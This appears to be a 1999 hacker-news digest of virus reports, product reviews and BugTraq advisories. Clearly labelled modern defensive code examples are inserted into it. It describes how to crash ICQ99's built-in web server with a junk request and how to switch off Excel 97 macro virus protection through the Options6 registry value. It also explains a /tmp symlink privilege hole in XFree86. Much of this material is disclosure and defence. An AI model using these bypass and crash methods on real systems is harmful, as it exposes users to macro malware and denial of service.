BY BOB BREWIN (antenna@fcw.com)

ABOARD THE USS BLUE RIDGE -- The wildly proliferating computer
virus "Melissa," which has infected e-mail servers across government and the
private sector, has made its way to e-mail accounts on this command ship of
the U.S. 7th Fleet, operating 20 miles off the coast of Guam in the western
Pacific Ocean.

The Melissa macrovirus, which began hitting systems last week, comes in the
form of an e-mail attachment. While the virus does no harm to an
organization's data or software, it can slow down and eventually crash the
e-mail server. The virus propagates itself by using a PC user's e-mail address
book to forward itself to other users.

But, thanks to a timely alert from the Navy's Fleet Information Warfare
Center (FIWC), the Blue Ridge managed to stop Melissa before its spread,
according to Cmdr. Michael Felmly, assistant chief of staff for command,
control, communications, computers and intelligence for the 7th Fleet.

"We got a heads up on what to do and what not to do" last weekend from
FIWC via the Navy's Pacific Region Network Operations center in Hawaii,
Felmly said. The center supports the Blue Ridge and the eight 7th Fleet ships
participating in the semiannual Tandem Thrust exercise.

The information technology staff identified three e-mails that had the virus and
isolated them before they spread throughout the ship's unclassified local-area
network, which hosts 1,600 e-mail accounts, said Dennis Kaida, a network
and systems engineer from the Navy's Space and Naval Warfare Systems
Command who is temporarily assigned to the Blue Ridge for Tandem
Thrust.

Kaida said that by the time the 7th Fleet network staff had isolated the e-mails
containing the virus, the network crew had gone to the Symantec Corp. home
page and downloaded Norton AntiVirus software that works against the
Melissa virus.

Vice Adm. Walter Doran, commander of the 7th Fleet, said that the ability of
the Melissa virus to make its way to this ship -- the showcase of the
networked Navy with a high-speed fiber-optic backbone and multiple satellite
links to the outside world -- highlighted the downside of such connectivity.

In the not-so-distant past, Doran said, "when you went to sea, you took off
the lines" and lost most connections to the world "except for a squawky
radio." But, thanks to the high speed network and satellite connections, Doran
said, "we are very much connected even at sea." In fact, shortly after
concluding the Melissa battle, the ship's staff had to gear up to fight off the
similar "Papa" virus, which attacks Microsoft Corp. Excel spreadsheets.

MARCH 30, 1999 . . . 13:50 EST


12.4a Melissa takes down Marine Corps e-mail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BY DANIEL VERTON (dan_verton@fcw.com)
http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html
<a href="link</a">http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html">link</a>

The fast-spreading e-mail virus "Melissa" has forced the Marine Corps to
shut down its base-to-base e-mail communications at least until tomorrow, a
spokeswoman for the Marines confirmed today.

According to the spokeswoman, the Marines are able to communicate
internally within each base, but all base-to-base e-mail connectivity has been
shut down until network administrators feel comfortable that they have taken
the appropriate security measures to protect against the virus. Other Internet
connections between bases have not been affected.

A spokeswoman for the Defense Department's Joint Task Force for
Computer Network Defense said the Army and the Air Force took their
servicewide servers down over the weekend to purge them of any messages
that might contain the Melissa macrovirus.

Melissa began infecting systems across the country late last week and comes
in the form of an e-mail attachment. While the virus does no harm to an
organization's data or software, it can slow down and eventually crash the
e-mail server. The virus propagates itself by using a PC user's e-mail address
book to forward itself to other users.


@HWA


12.5 Melissa virus creator apprehended
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/

MELISSA CREATOR APPREHENDED
by BHZ, Friday 2nd Apr 1999 on 7.29 pm CET
Melissa, the famed macro virus that infected 100,000 computers in 3 days, is still very
active in cyberspace. Many mutated viruses have been created, and not just for MS Word,
but for MS Excel (x97/Papa.b, created as a personal vendetta against Fred Cohen, who
fingered one group for creating the famous Caligula virus that steals PGP keys).
According to today's post to alt.comp.virus, Melissa's creator was caught. David L.
Smith, 30, of Aberdeen, was arrested Thursday night at his brother's house in nearby
Eatontown, said Rita Malley, a spokeswoman for Attorney General Peter Verniero.


13.0 [ISN] A hacker's worst nightmare
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the ISN mailing list...


http://www.zdnet.com/pccomp/stories/all/0,6605,392297,00.html


PRODUCT REVIEWS
A Hacker's Worst Nightmare
Christopher Null
March 10, 1999


Stop Internet intruders in their tracks


You don't really want to share your customers' credit card numbers with
every hacker on the Internet, do you? If your network is connected to the
Internet and protected only by a firewall, you might be leaving your
business--and your customers' accounts--wide open to data pirates. A
firewall is a good first line of defense, but it's probably not enough to
keep out persistent intruders. We tested three new antihacker tools and
found a wide range of useful and not-so-useful utilities that help you
plug the holes on your network.


Internet Security Systems Internet Scanner 5.6 is an exhaustive utility
that simulates more than 450 types of network attacks, then presents
comprehensive reports about the state of your network. Internet Scanner
is a mainstay with security experts, but it's also deceptively simple to
master.


Internet Scanner predefines several attack simulation packages--typically
called scans--ranging from simple scans to special scans for testing
router security. The simulated attacks are varied, including Windows NT-
specific attacks, mail server vulnerability checks, and denial-of-service
attacks (such as the Ping of Death). With all these tests, you'd think
Internet Scanner would have to run overnight to get results. Not so. A
complete scan with all tests on two systems took only 11 minutes to run.


Internet Scanner's new SmartScan feature keeps track of the results each
time you run it and uses that information to intelligently poke holes in
your network, much like a hacker who keeps track of previous successes and
failures. Altogether, it's the brainiest way to examine your network
security.


Heal Thyself

Netect's HackerShield 1.1 is a relative newcomer to the
security scene, and it's still growing up. HackerShield strives to be a
comprehensive network analysis tool, but it falls far short in scope and
power. The product contains roughly 250 checks, substantially fewer than
the competition. And every time we tried running a full-network scan, it
froze in midtest because of its own denial-of-service attacks. We never
did get complete results, but with 120 checks activated, it took a long 25
minutes to scan two systems.


HackerShield does have its pluses. Its RapidFire updates are periodically
available on Netect's Web site, and downloading them expands the number of
attacks HackerShield simulates (about 50 are available each month).
HackerShield also automatically fixes some problems, whereas with Internet
Scanner you have to patch all the holes yourself. For example, both tools
will find that your server allows an administrator password, but only
HackerShield will fix it for you. Unfortunately, the autofix option worked
on only 15 percent of the problems we unearthed in our tests.


Rich Man's Expert

Say you've patched all the holes you can, but you still
want to estimate the damage should a hacker make it through and abscond
with valuable trade secrets. L3 Network Security provides the solution in
Expert 3.0, a sophisticated network mapping and risk analysis system.


Unlike the other two products, Expert 3.0 doesn't actually test the
security on your network. Instead, you build a network map yourself
(Expert automates much of this process) and define the threats from
outside--and inside--the organization. Expert then provides detailed,
customized reports about threat and risk levels.


Expert works hand-in-hand with your antihacker software and firewall to
help you plan for the worst contingency, but its $9,500 price is steep.
Even though this includes two days of offsite training, you'll likely find
you have more affordable ways to map your network (with Visio) and crunch
numbers (with Excel).


Internet Scanner 5.6


Rating: Four Stars
Verdict: The most comprehensive security package on the market.
Pros: Exhaustive feature set; fast.
Cons: Pricey; cryptic descriptions.
Starting at $2,795 est. street price / Internet Security
Systems / (678) 443-6000


Expert 3.0


Rating: Three Stars
Verdict: A fancy way to map your network and analyze its risks.
Pros: Makes risk analysis simple.
Cons: Expensive for the features.
$9,500 est. street price / L3 Network Security / (888) 280-7475


HackerShield 1.1


Rating: Two Stars
Verdict: The antihacker tool with lots of hand-holding.
Pros: Automatically fixes some holes.
Cons: Slow; not comprehensive.
$695 per server est. street price / Netect /(888)
263-8328


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

13.1 How bad is Pentium III privacy threat?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From C|Net news

Pentium III: How bad is privacy threat?
By Stephanie Miles
Staff Writer, CNET News.com
NEWS.COM
March 26, 1999, 11:45 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,34300,00.html

News analysis

Do the serial numbers on Intel's computer chips really present a major threat to consumer privacy?

Technology experts say recent reports of software programs capable of "grabbing" PC users' Pentium III serial numbers without their knowledge or consent
shouldn't alarm PC users. On the other hand, those on all sides of the debate agree that no one should be overly confident about the level of security these
microprocessors can ensure.

Nathan Brookwood, an analyst at Insight 64, reflects that conflict. "I'm not a good person at anticipating all the evil things people can do. But in my view, the whole
role of the PSN [processor serial number] has been somewhat overstated," he said.

Yet he was quick to add: "When you have a transaction and a user at one end of the network and a machine where the transaction is being handled at the other end,
and a big network in between, there are lots of ways to compromise a machine or break into a site."

Even privacy advocates concede that it is technically difficult for a hacker to do much harm if armed only with a purloined processor serial number. But these groups
are concerned that future technologies and uses of the Internet could allow grave abuse of this information in ways not envisioned today.

Regardless of the actual risk, the debate has become something of a battle royal between privacy advocates and corporate interests. The emotions arising from the
issue seem to transcend the mundane machinations of digital technology, introducing Orwellian rhetoric often reserved for such constitutional powder kegs as gun
control.

"Individuals should be able to control their identity and other forms of authentication," said Ari Schwartz, senior policy analyst for the Center for Democracy and
Technology, which has filed a complaint with the Federal Trade Commission, requesting that Intel be precluded from manufacturing the Pentium III with the serial
code.

Intel's recently released Pentium III processor contains a 96-bit serial number hardwired into the chip. The number was designed to add another layer of protection
for e-commerce transactions and to aid organizations in tracking assets.

Independent chip analysts say the framework in which the serial number will be exchanged makes it difficult for any third party to use a nabbed number nefariously.
These experts acknowledge that hackers or marketers will be able to steal it--but a number is likely all they will get, they say, not the key to your life.

"All they have at that point is a serial number, and that doesn't really help a lot," said Peter Glaskowsky, an analyst at MicroDesign Resources. To take advantage of
someone, he added, "you need a combination of an unethical Web site developer and a stupid Web site developer."

At the same time, Glaskowsky said, the serial number offers little in the way of added security. And companies looking for better ways to manage technology across
large networks are not sold on the Pentium III either.

"Asset management now is not done easily--it's either done physically or through personnel," said Pete Jackson, president of Intraware, a systems integration firm.
"It's a major problem throughout the enterprise, but I don't think a lot of people are going to switch to the Pentium III to solve the problem."

Security concerns have dogged the high-tech industry relentlessly, particularly with the wild proliferation of Internet use. On the software side, Microsoft has faced its
own share of privacy issues, acknowledging earlier this month that Windows 98 collects information on users' PCs through the Windows 98 registration process and
that documents created with Office 97 applications include information related to document authors. Microsoft halted the practice and issued patches for the security
holes.

Against this backdrop, it comes as no surprise that the Pentium III serial number has enjoyed a short but tortured life. Intel revealed the serial number system in
February, stating that the number was a third form of identification.

In Intel's view, those who want to gain access to number-protected sites will provide their user names and passwords, as well as let distant Web servers send down
an applet to confirm the processor serial numbers, said Pat Gelsinger, corporate vice president at Intel.

Although the serial number never changes, the confirming applet "hashes" it so that sites only get a placebo of the real number--and no two Web sites get the same
placebo.

In other words, if your processor serial number is X, one Web site will know you as Y, while another might know you as Z. Another layer of encryption disguises Y
or Z for the confirming transaction. During the exchange, processor numbers are further disguised to minimize the possibility that the true serial number will be
intercepted.

Therein lies the problem to privacy advocates, who note that this encryption technology is an option for Web sites but that there is no guarantee that all of them will
use it. "We're not confident about [widespread encryption], no," Schwartz said, understatedly.

Turning it back "on"
The plan was to have computer makers leave the serial number "on," or accessible and open to confirming software agents. After privacy groups protested, Intel
changed the software utility so that the PSN would be disabled by default shortly after a PC boots up.

Even before the chip was available in computers, a German technology magazine claimed that it had developed a method of circumventing the Intel-developed
software utility. Canadian software firm Zero-Knowledge Systems then followed with an ActiveX control that grabs the serial number before the software utility
is activated, after tricking a user into restarting their system.

But while these groups may have succeeded if their intent was embarrassing the world's largest chipmaker, analysts say that a stolen serial code does not present
much of an actual threat to a typical Pentium III user.

Even if the disabling utility is cracked, it would still be extremely difficult to do anything with the serial number, analysts maintain. For instance, if a hacker wanted to
get into private accounts, they would likely need more information, they say.

Most Web sites, especially e-commerce sites, which use the Processor Serial Number, require other forms of identity verification, not only to reassure visitors, but
also to protect their own interests, Glaskowsky said.

"Any Web site that is intelligent is going to ask you for some kind of password," he said. "It's inevitable that responsible online businesses will have a two-stage
verification process. One of those might be the serial number."

Many hacks required
Pulling this off is no small feat either, technologically speaking. A hacker couldn't just issue the PSN to a distant server. The hashed number through which the distant
server knows the user would have to be determined, which involves breaking into the distant server's database as well.

Then, even if that number could be determined, the additional layer of encryption would have to be hacked so that the hacker can send a confirming transactional
number that the distant server will accept.

"It's extremely difficult to [use the serial number] to impersonate another person--not impossible, but difficult," Glaskowsky explained. "It's far more straightforward
for a Web site operator to steal your serial number than for a hacker to trick them."

The pervasiveness of the encryption layer dents the other theory of danger: unscrupulous sharing. Although there may be a financial incentive for Web sites to sell or
share this number with other sites, there is no way to connect the encrypted number to an individual user, according to George Alfs, an Intel spokesman.

"It can't be compared to other Web site serial numbers," he said. "If sites are using the tamper-resistant tools, the numbers won't match."
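The two properties the article attributes to the "placebo" scheme, that each site sees a different value and that two sites therefore have nothing to join their records on, come straight out of a per-site keyed hash, and so does the advocates' caveat that a site which skips the hashing stores a number every other such site also stores. The model below is an added example, not Intel's applet or protocol: the 96-bit PSN value, the site names and the choice of HMAC-SHA256 as the hash are all constructed assumptions. It serves both the "hashes it so that sites only get a placebo" passage and the "unscrupulous sharing" passage above.

```python
"""Model of the per-site "placebo" identifier described in the article.

Added example, not Intel's applet or protocol: each site is handed a
site-specific hash of the 96-bit PSN instead of the raw number, so a
returning machine is recognisable to that site but two sites' records do
not share a join key.  The PSN value, the site names and the use of
HMAC-SHA256 as the hash are all constructed assumptions.
"""
import hashlib
import hmac
from collections import defaultdict

PSN_BYTES = 96 // 8  # the article gives the PSN as 96 bits


def site_view(psn: bytes, site: str, hashed: bool = True) -> str:
    """What one site ends up storing for this machine.

    hashed=True  -> the per-site pseudonym (the scheme the article describes)
    hashed=False -> the raw serial, the case privacy advocates worry about,
                    since using the hashing is optional for the site.
    """
    if len(psn) != PSN_BYTES:
        raise ValueError("PSN must be exactly 96 bits")
    if not hashed:
        return psn.hex()
    # Keying the MAC with the PSN and feeding it the site name yields a
    # value that is stable for one site and different across sites.
    return hmac.new(psn, site.encode("utf-8"), hashlib.sha256).hexdigest()


def joinable_profiles(records):
    """Given (site, stored_identifier) pairs pooled between sites, return the
    groups of sites whose records can be joined on an identical identifier."""
    by_ident = defaultdict(set)
    for site, ident in records:
        by_ident[ident].add(site)
    return sorted(sorted(sites) for sites in by_ident.values() if len(sites) > 1)


# Constructed 96-bit PSN; not a real processor's value.
PSN = bytes.fromhex("0123456789abcdef01234567")
SITES = ["shop.example", "news.example", "forum.example"]


def shared_records(hashed: bool):
    """What a data broker would receive if every site pooled its identifier."""
    return [(site, site_view(PSN, site, hashed)) for site in SITES]


if __name__ == "__main__":
    print("hashed :", joinable_profiles(shared_records(hashed=True)))
    print("raw    :", joinable_profiles(shared_records(hashed=False)))
```

With hashing on, the pooled records contain three unrelated strings and no profile can be assembled; with it off, every site holds the same 24 hex digits and the join is immediate. The per-site value is still a persistent identifier for that one site, which is the point the critics quoted later in the article are making.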

Assurances fall on deaf ears
Many users, though realistic about the risks of using the Internet, are not assuaged by analyst and Intel reassurances. Web sites "knowing who you are...is pretty
much available through many sources, so don't sweat the small stuff," wrote reader Randy Dickson, who raised concerns about serial number thieves impersonating
PC users in chat rooms and newsgroups.

"While I think Intel had their heart in the right place, they seriously misunderstood how this information could be misused...Some of us don't mind the fact that Big
Brother may be watching, as long as he can't be misled," Dickson wrote.

Others, like Norman Thorsen, are more concerned about Web sites gathering yet more personal information about visitors, regardless of whether these sites then sell
or share the data. "Given this opportunity, marketers and, quite possibly government agencies, will collect as much information as possible," Thorsen wrote. "No one
asked the customer about collecting this information--Intel decided to provide it without prior notification. By definition, that is an invasion of privacy."

Dickson and other readers are concerned about Web sites that will only allow surfers to visit if the personal serial number is enabled.

"Web sites will develop content that requires the PSN, so that personal privacy must be compromised in order to use the Internet," one reader wrote. "Intel's
technology is fundamentally un-American. It is equivalent to installing video cameras on every street corner."

Many companies include serial numbers with their products, including software and hard drive manufacturers but do not share or sell that type of customer
information. This is not necessarily out of any noble respect for the privacy of its customers, but because it would be against their own strategic interests, said Greg
Blatnik, vice president of Zona Research.

"That type of information tends to have more value to the company that provided the product," Blatnik said, adding that many companies use customer lists
generated with the help of serial numbers to sell more products. "Companies guard that information fiercely."

Privacy advocates concede many of these points. What has them mostly worried is the future.

Future shock?
"What's the damage that could be done from a hacker grabbing your PSN? Not much right now," said Jason Catlett, president of Junkbusters, an advocacy group
supporting a boycott of Intel until the company removes the serial number, in an email interview. "But if Intel's plans of turning the PSN into an e-commerce identifier
pan out in the next few years, it will be used for theft of identity."

Catlett predicts it will be several years before the total privacy implications of the serial code are known. And by that time, he fears, such serial codes will likely have
become a de facto standard in identity authentication.

"Every time you move forward with technology, this happens," Brookwood said. "Before they created credit cards, there was no credit card fraud."


@HWA


14.0 ICQ99 Bug, erh feature turns your icq into a DoSable web server..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 29 Mar 1999 01:07:18 -0500
From: Ronald A. Jarrell <jarrell@VTSERF.CC.VT.EDU>
To: BUGTRAQ@netspace.org
Subject: icq DOS / possible "stupid user" vulnerability.

Ok, I was a bit surprised when, in playing with the new ICQ99a build 1700 v2.13
client (which I believe is the first publicly distributed one of the
99 family), I turned on the "Activate my home page" feature, and turned
my laptop into a web server...

Complete with a file server that allows by default anything in the
"program files\icq\homepage\root\YOUR#\files" folder to be requested.
Even set up a guest book, chat service, etc...

After getting over being astonished (yea, they said "turning this on
might increase people's access to your machine, and tell them your
ip address" - of course it will. You're setting up a bloody web server
you idiots. A bad one at that.) I naturally started doing some poking.

Telnet to your port 80, and enter some non http gibberish. I tried
"quit<cr>" for grins. Blam. Down goes the ICQ client with a GPF.
Got someone else to turn theirs on, and sure enough, managed to shoot
him down too.

I warned Mirabilis about it. Folks at institutions that worry about
such things, but let their employees run ICQ might want to be aware
that said employees might well be running web servers now and not
even know it. On your ICQ contact list, if they're on it, said
users show up with a little house next to their name.

--
Ron Jarrell
VA Tech Computing Center
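The failure the post describes, a GPF on a request line that is not HTTP at all, is the textbook case for validating the request line before anything else touches it. The block below is an added example and not ICQ's code: a minimal request-line validator that answers junk such as "quit" with 400 Bad Request instead of faulting. The method list, path grammar and length limit are our own choices.

```python
"""Defensive request-line handling for the crash described in the post.

Added example, not ICQ's code: a minimal HTTP request-line validator that
answers junk such as "quit" with 400 Bad Request instead of faulting.
Method list, path grammar and size limit are our choices.
"""
import re

# method, absolute path of printable ASCII without spaces, HTTP/1.0 or 1.1
REQUEST_LINE = re.compile(rb"([A-Z]{3,8}) (/[!-~]*) (HTTP/1\.[01])")
MAX_REQUEST_LINE = 4096
ALLOWED_METHODS = {"GET", "HEAD"}


class BadRequest(Exception):
    """Raised for any line that is not a well-formed HTTP request line."""


def parse_request_line(line: bytes):
    """Return (method, path, version) or raise BadRequest; never faults."""
    if not isinstance(line, bytes):
        raise BadRequest("expected bytes from the socket")
    if len(line) > MAX_REQUEST_LINE:
        raise BadRequest("request line too long")
    # Accept CRLF (what telnet sends) and bare LF, then validate strictly.
    line = line.rstrip(b"\r\n")
    if not line:
        raise BadRequest("empty request line")
    m = REQUEST_LINE.fullmatch(line)
    if m is None:
        raise BadRequest("malformed request line")
    method, path, version = (part.decode("ascii") for part in m.groups())
    return method, path, version


def respond(line: bytes) -> int:
    """Status code this server would return for one raw request line."""
    try:
        method, _path, _version = parse_request_line(line)
    except BadRequest:
        return 400
    if method not in ALLOWED_METHODS:
        return 405
    return 200


if __name__ == "__main__":
    for raw in (b"quit\r\n", b"GET /index.html HTTP/1.0\r\n",
                b"POST / HTTP/1.1\r\n", b""):
        print(raw, "->", respond(raw))
```

The same structure applies to any listener a desktop application opens: bound the line length, treat the input as untrusted bytes, and map every parse failure to a protocol-level error rather than letting it reach the code that assumes a well-formed request.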

@HWA


15.0 Russian crackers take out whitehouse.gov?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From wired;
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18787.html

Did Russians Get Whitehouse.gov?
by Declan McCullagh

3:00 a.m. 29.Mar.99.PST WASHINGTON -- The official White House
Web site was offline all day Sunday in what appeared to be its most serious
outage to date.

A Russian online newspaper reported that anti-NATO crackers were responsible,
but a source close to whitehouse.gov blamed a hardware failure.

The site was down until about 10 a.m. EST Monday. Visitors were unable to
connect, although email to and from whitehouse.gov continued to work.

"They have a problem that is not related to an external attack," the source said
Sunday.

The White House is a popular target for cracking attempts, but no content on the
site has ever been altered. Dozens of break-in attempts happen every day, the
source said.

On Sunday, a number of other Web sites found their home pages replaced with
identical protests of US and NATO bombing of Yugoslavia.

"Russian hackers demand to stop terrorist aggression against Jugoslavia!" said
one message on a Web site operated by Orange Coast College in Costa Mesa,
California. Another note on the same page: "To Adolf Clinton: FUCK OUT,
looser!! Go fucks Monica!"
Other sites that boasted the same message included
cfmsd.com and darkarmies.com.

The Moscow-based Gazeta.Ru online newspaper said Russian crackers had broken
into those sites -- and had pulled the plug on whitehouse.gov too.

"Russian computer crime authorities, contacted by the newspaper, declared
that they would confront these hacking attacks with same severity as they would
have done in any other case of unauthorised penetration into computer networks
(punishable under section 272 of Russia's Penal Code, 1997).

But the authorities went on to stress, that 'no complaint was filed so far from
the American side, which would be necessary for us to start any sort of
proceedings,'"
Anton Nossik, who wrote the article, told Wired News in an email
message.

Security experts said whitehouse.gov was likely offline for one of three reasons:
A compromised router, a hardware failure, or a denial-of-service attack in which the
server is overloaded by attackers. Peter Shipley, the chief security architect
for KPMG, said there's no easy defense against denial-of-service attacks. Once
recognized, however, they can be dealt with within minutes or hours.

Shipley also said it was unlikely a hardware failure by itself would bring a
site like whitehouse.gov down for a day or more.

"You can bring a router back online rather easily," he said. "It's hard to believe a
router would keep a site down for 24 hours."


PSI.net, which provides the White House's link to the outside world, did not
immediately return phone calls late Sunday. Neither did a White House spokesman.

@HWA


16.0 New Excel macro virus can bypass protections and execute code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Date: Mon, 29 Mar 1999 12:51:09 -0500
From: rotaiv <rotaiv@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Bypassing Excel Macro Virus Protection


With the sudden attention macro viruses have received over the
weekend, I thought I would share a couple of items I find concerning
with Excel macro viruses.

In Excel, if you go to "Tools - Options - General" you can check the
"Macro Virus Protection" check-box and this should prevent any macro
viruses being executed without your knowledge. This is true in most
cases but it can be bypassed with several methods.


Password Protected Spreadsheets
===============================

If a file is password protected, Excel assumes this to be a "trusted"
source so it ignores the "Macro Virus Protection" option. This allows
any code contained in the document to be executed without the user's
knowledge.

Here is a scenario that should not be too hard to believe: Someone
downloads a list of passwords for pornographic sites from alt.sex and
types in a disclaimer password such as "I AM AN ADULT". This allows a
macro virus to be executed even if the "Macro Virus Option" is
checked.

The solution is simple. Don't open any password documents from a non
trusted source. If you really want to open the file, type in the
password then hold down the SHIFT key before you click "OK" on the
password dialog box. Holding down the shift key will by-pass any
macros and prevent them from being executed.

For more details, refer to the following TechNet article:
Q176640 - XL: No Macro Virus Warning Appears Opening Protected
Workbook


Documents in the XLSTART Directory
==================================

Any documents saved in the XLSTART directory are considered to be a
"trusted" source so once again, the "Macro Virus Protection" is
ignored. The solution here is obvious but not so easy to implement.
Don't allow any documents (or shortcuts) to be saved in this
directory. Remember, many users may have their PERSONAL.XLS file in
this directory which contains macros they have supposedly created
themselves.

The XLSTART directory on my PC is as follows:
C:\Program Files\Microsoft Office\Office\XLStart

For more details, refer to the following TechNet article:
Q180614 - XL: Workbooks in Startup Folder Are Not Scanned for Macros


Disabling 'Macro Virus Protection'
==================================

With Word, the macro virus protection can be disabled with the
following command:
Options.VirusProtection = False

To my knowledge, there is no such command for Excel. However, this
option can be changed with a reg hack that could be initiated from a
batch file or from a VBA macro Shell command. On my PC, the "Macro
Virus Protection" option is stored as a dword value in the following
registry key:

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]

To enable the virus protection, use:
"Options6"=dword:00000008

To disable the virus protection, use:
"Options6"=dword:00000000

This may not be exactly the same for every PC as "Options6" controls
several options depending on the value of the first four bits. See
below for details:

bit 0 Show Name part of Chart Tips
bit 1 Show Value part of Chart Tips
bit 2 Intellimouse Roll action: 0 = scroll, 1= zoom
bit 3 Macro Virus Protection
bit 4-15 (Reserved)

For more details, refer to the following TechNet article:
Q169811 - XL97: Using the Policy Editor to Force Macro Virus
Protection


Conclusion
==========

I am sure many people are under the impression that if the "Macro
Virus Protection" option is enabled in Excel they are safe from macro
viruses. However, if someone felt so inclined, they could easily
bypass this protection and execute VBA code without the user's
knowledge.

I have tested all the above examples using Microsoft Office97
Professional with SR2. I found the references in TechNet but I have
not searched Microsoft's Web-site to see if there are any patches or
hot-fixes for these three items.

'nuff said ...

rotaiv -£-

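Added here as an example, not part of rotaiv's post: auditing the "Options6" value from a .reg export using the bit layout the post lists (bit 3 = Macro Virus Protection, bits 0-2 = chart tips and wheel action), and computing a fix that sets bit 3 without clobbering the other bits the way a blind write of 00000008 does. The .reg text is a constructed sample, not from a real machine.

```c
/* Added example: decode and audit the Excel 97 "Options6" DWORD described
 * in the post above, from a .reg export. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bit layout of Options6 as given in the post (bits 4-15 reserved). */
#define OPT6_CHARTTIP_NAME    (1u << 0)
#define OPT6_CHARTTIP_VALUE   (1u << 1)
#define OPT6_WHEEL_ZOOM       (1u << 2)
#define OPT6_MACRO_VIRUS_PROT (1u << 3)

/* Parse one .reg line of the form "Name"=dword:XXXXXXXX (exactly 8 hex
 * digits, as regedit writes it). Returns 1 and stores the value when the
 * line carries `name`, 0 otherwise. */
int parse_reg_dword_line(const char *line, const char *name, uint32_t *out)
{
    char prefix[80];
    char *end;
    unsigned long v;
    int n, i;

    while (isspace((unsigned char)*line))
        line++;
    n = snprintf(prefix, sizeof prefix, "\"%s\"=dword:", name);
    if (n < 0 || (size_t)n >= sizeof prefix || strncmp(line, prefix, (size_t)n) != 0)
        return 0;
    line += n;
    for (i = 0; i < 8; i++)
        if (!isxdigit((unsigned char)line[i]))
            return 0;                     /* too short or not hex */
    v = strtoul(line, &end, 16);
    if (end != line + 8)
        return 0;                         /* more than 8 hex digits */
    while (isspace((unsigned char)*end))
        end++;
    if (*end != '\0')
        return 0;                         /* trailing junk */
    *out = (uint32_t)v;
    return 1;
}

/* Scan a .reg export for Options6. Returns -1 if the value is absent,
 * 0 if Macro Virus Protection is off, 1 if it is on; *value_out (when
 * non-NULL) receives the raw DWORD. */
int audit_options6(const char *regtext, uint32_t *value_out)
{
    const char *p = regtext;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        uint32_t v = 0;

        if (len < sizeof line) {
            memcpy(line, p, len);
            line[len] = '\0';
            if (parse_reg_dword_line(line, "Options6", &v)) {
                if (value_out)
                    *value_out = v;
                return (v & OPT6_MACRO_VIRUS_PROT) ? 1 : 0;
            }
        }
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return -1;
}

/* The post's "enable" recipe writes 00000008 outright, which also clears
 * bits 0-2. The minimal change is to set bit 3 and leave the rest alone. */
uint32_t options6_with_protection(uint32_t current)
{
    return current | OPT6_MACRO_VIRUS_PROT;
}

/* 1 if writing `proposed` over `current` would change anything other than
 * the Macro Virus Protection bit. */
int options6_clobbers_other_bits(uint32_t current, uint32_t proposed)
{
    return ((current ^ proposed) & ~OPT6_MACRO_VIRUS_PROT) != 0;
}

/* Constructed sample export: chart tips and wheel zoom on, protection off. */
const char SAMPLE_REG[] =
    "REGEDIT4\n"
    "\n"
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\8.0\\Excel\\Microsoft Excel]\n"
    "\"Options6\"=dword:00000007\n";

int main(void)
{
    uint32_t v = 0;
    int state = audit_options6(SAMPLE_REG, &v);

    printf("Options6 = %08x, macro virus protection: %s\n", v,
           state == 1 ? "on" : state == 0 ? "off" : "not present");
    if (state == 0)
        printf("fix with \"Options6\"=dword:%08x (blind 00000008 would clobber: %s)\n",
               options6_with_protection(v),
               options6_clobbers_other_bits(v, 0x8) ? "yes" : "no");
    return 0;
}
```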


@HWA


17.0 xfree86 SUSE exploit
~~~~~~~~~~~~~~~~~~~~

Date: Sun, 28 Mar 1999 23:20:58 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: SuSE Security Announcement - XFree86


______________________________________________________________________________

SuSE Security Announcement

Package: xf86-3.3.3-5
Date: Sun Mar 28 12:26:39 CEST 1999
Affected: unix operating systems using xfree86

______________________________________________________________________________

A security hole was discovered in the package mentioned above.
Please update as soon as possible or disable the service if you are using
this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as
well, please contact your vendor for information about this issue.

Thanks to the people from bugtraq for providing the details of this
vulnerability and especially the XFree86 programmers who made a fix
ready over the weekend.

Please note that we provide this information on an "as-is" basis only.
There is no warranty whatsoever and no liability for any direct, indirect or
incidental damage arising from this information or the installation of
the update package.
______________________________________________________________________________

1. Problem Description

XFree86 creates a directory in /tmp with the name .X11-unix for
the X sockets and sets the directory to mode 1777.
If an attacker creates a symlink with that filename and points
it to another directory (e.g. /root), the permissions of the target
directory are set to 1777.

2. Impact

A local attacker may create files with any contents in any directory.

3. Solution

Upgrade your XF86.

As a temporary fix you can put these commands into /sbin/init.d/boot.local:

/bin/rm -rf /tmp/.X11-unix
mkdir -p -m 1777 /tmp/.X11-unix

______________________________________________________________________________

Here are the md5 checksums of the upgrade packages, please verify these
before installing the new packages:


______________________________________________________________________________

You will find the updates on our ftp-Server:

SuSE 6.0:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-3.3.3.1-SuSE/glibc

SuSE <= 5.3:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-3.3.3.1-SuSE/libc5

Webpage for patches:
http://www.suse.de/patches/index.html

or try the following web pages for a list of mirrors:

http://www.suse.de/ftp.html
http://www.suse.com/ftp_new.html

______________________________________________________________________________

SuSE has got two free security mailing list services to which any
interested party may subscribe:

suse-security@suse.com - unmoderated and for general/linux/SuSE
                         security discussions. All SuSE security
                         announcements are sent to this list.

